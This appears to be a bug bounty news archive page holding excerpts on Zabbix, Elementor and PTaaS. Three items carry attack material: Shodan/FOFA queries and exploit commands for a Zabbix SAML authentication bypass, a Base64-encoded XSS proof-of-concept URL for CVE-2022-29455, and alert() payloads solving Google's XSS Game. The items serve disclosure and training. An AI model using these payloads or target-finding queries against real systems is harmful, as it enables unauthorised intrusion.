Category archives: Bug Bounty News Feed

Hey Google, Talk to Feedly

Hey Google, Talk to Feedly
Have you ever wished Google Assistant could read you the articles in your Feedly? Now it can. Nick Felker has created a Google Assistant Action that integrates Google Assistant and Feedly. Thanks to the Feedly action, Google Assistant can list the headlines in your feeds, read specific articles, and even...

Zabbix – SAML SSO Authentication Bypass

In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Dork: shodan-query: http.favicon.hash:892542951 fofa-query: app="ZABBIX-监控系统" && body="saml" usage nuclei -l target.txt -tags zabbix python3 zabbix_session_exp.py -t https:target.com...

CVE 2022-29455 is still affecting millions of WordPress sites

– The DOM-based Reflected Cross-Site Scripting (XSS) vulnerability is in Elementor’s Elementor Website Builder plugin <= 3.5.5 versions.  This issue leads to: CVE 2022-29455 4websecurity.com already reported the vulnerability to tens of thousands websites that are using WordPress and this version of the plugin.  Reference:    – https://nvd.nist.gov/vuln/detail/CVE-2022-29455    – https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor    – https://www.rotem-bar.com/elementor * POC (Proof Of Concept): The payload is Base64 encoded: https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0= Decoded from...

Google XSS Game

https://xss-game.appspot.com/ Level #1: Hello, world of XSShttps://xss-game.appspot.com/level1Solution: <script>alert('xss')</script>hint: inspect the source code of the page Level #2: Persistence is keyhttps://xss-game.appspot.com/level2Solution: <img src=x onerror=alert('XSS')>hint: “welcome” post contains HTML Level #3: That sinking feeling…https://xss-game.appspot.com/level3/frame#1Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'> Level #4: Context mattershttps://xss-game.appspot.com/level4/frameSolution: timer=');alert('xss Level #5: Breaking protocolhttps://xss-game.appspot.com/level5/frameSolution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss') Level #6: Follow the Xhttps://xss-game.appspot.com/level6/frame#/static/gadget.jsSolution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')...

Interview With Open Bug Bounty

Speaking with the team at Open Bug Bounty was the highlight of her day for Aviva Zacks of Safety Detectives. She learned that their community-driven spirit is exactly what advantageously differentiates their project from the others out there. https://www.safetydetectives.com/blog/interview-open-bug-bounty/ [Source]

What is Penetration Testing as a Service?

Penetration Testing as a Service (PTaaS), much like the other renditions of centrally hosted Software as a Service technologies (SaaS), is about providing a more flexible, continuous and scalable pentesting service. While remaining distinct from bug bounty programs, PTaaS is a modern approach to the traditional pentesting format.  How does Penetration...

Intigriti continues to innovate security testing with a redefined penetration testing offering 

Intigriti, Europe’s leading crowdsourced security platform, today announced a significant expansion of its bug bounty platform offerings with the launch of Hybrid Pentesting. The Penetration Testing as a Service (PTaas) solution combines the pay-for-impact approach of bug bounty programs with the dedicated resourcing strategy found with classic penetration testing. The...

What does it mean to become an Intigriti partner?  

The need for continuous security testing is quickly cementing bug bounty platforms as an integral part of cybersecurity infrastructure. However, it’s less often that cybersecurity technology and solution providers supply bug bounty programs in addition to their other offerings. This is not surprising, given the careful approach and expertise that...

Edit & Remove Messages

TL;DR Changelog 39: Communication is key  Communicating with others about a bug or vulnerability that has been found and submitted as report is one of the necessary key features for a bug bounty platform. Communication between the relevant stakeholders should be quick, easy and transparent but also provide some assurance...

Six reasons to join Intigriti’s product team 

Working in Intigriti’s product team means playing a defining role in the global uptake of crowdsourced security. Since 2016, we’ve enabled hackers to use their skills for good and provide essential continuous testing for businesses. You’ll gain first-hand experience of a scaling company within a flexible working environment.   Join...